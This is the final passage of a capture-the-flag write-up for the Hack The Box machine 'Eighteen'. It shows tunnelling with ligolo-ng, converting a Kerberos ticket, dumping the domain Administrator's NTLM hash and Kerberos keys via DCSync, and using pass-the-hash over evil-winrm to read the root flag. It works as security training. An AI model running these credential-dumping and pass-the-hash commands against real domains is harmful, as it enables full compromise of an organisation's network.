┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ sudo ip link set ligolo up


$ ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://127.0.0.1:8080
WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed.
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.8.2

[Agent : EIGHTEEN\adam.scott@DC01] »
ligolo-ng » INFO[7164] Agent joined.                                 id=005056b0cf44 name="EIGHTEEN\\adam.scott@DC01" remote="10.129.136.7:61127"
ligolo-ng »
ligolo-ng » session
? Specify a session : 2 - EIGHTEEN\adam.scott@DC01 - 10.129.136.7:61127 - 005056b0cf44
[Agent : EIGHTEEN\adam.scott@DC01] » start
INFO[7195] Starting tunnel to EIGHTEEN\adam.scott@DC01 (005056b0cf44)
[Agent : EIGHTEEN\adam.scott@DC01] » ERRO[7226] connection was refused
ERRO[7281] connection was refused
[Agent : EIGHTEEN\adam.scott@DC01] »
[Agent : EIGHTEEN\adam.scott@DC01] »

DCSync - Dumping the Administrator Hash

We convert the base64 ticket to a .kirbi file, then to a .ccache for use with Impacket:

┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ nano ticket.kirbi                                                                                                   
                                                                                                                        
┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ cat ticket.kirbi | base64 -d > real.kirbi

                                                                                                                        
┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ ticketConverter.py real.kirbi ticket.ccache                                                                         

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] converting kirbi to ccache...
[+] done
                                                                                                                        
┌──(kali㉿kali)-[~/Downloads/ligolo-ng_proxy_0.8.2_linux_amd64]
└─$ export KRB5CCNAME=$(pwd)/ticket.ccache                                                                              

We sync the clock with the DC and perform a DCSync to dump the Administrator’s NTLM hash:

$ sudo ntpdate dc01.eighteen.htb ;impacket-secretsdump -k -no-pass eighteen.htb/testdmsa\[email protected] -dc-ip 240.0.0.1 -target-ip 240.0.0.1 -just-dc-user Administrator
2025-11-19 12:37:18.197197 (-0500) +25204.965372 +/- 0.473467 dc01.eighteen.htb 240.0.0.1 s1 no-leap
CLOCK: time stepped by 25204.965372
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
[*] Cleaning up...

Root Flag

With the Administrator NTLM hash, we pass-the-hash over WinRM to get a shell as Administrator:

─$ evil-winrm -i 10.129.136.7 -u administrator -H 0b133be956bfaddf9cea56701affddec

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion   

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
305caa3bf08f53f73ac8a821675e3a4a
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Conclusion

Eighteen was a great box showcasing the abuse of the new Delegated Managed Service Account (dMSA) feature in Windows Server 2025. The attack chain went from MSSQL credential reuse, through login impersonation and database enumeration, to hash cracking and password spraying for initial access. The privilege escalation leveraged the dMSA msDS-ManagedAccountPrecededByLink attribute to impersonate the Administrator and perform a DCSync, fully compromising the domain.

Hope you learned something new!

-0xkujen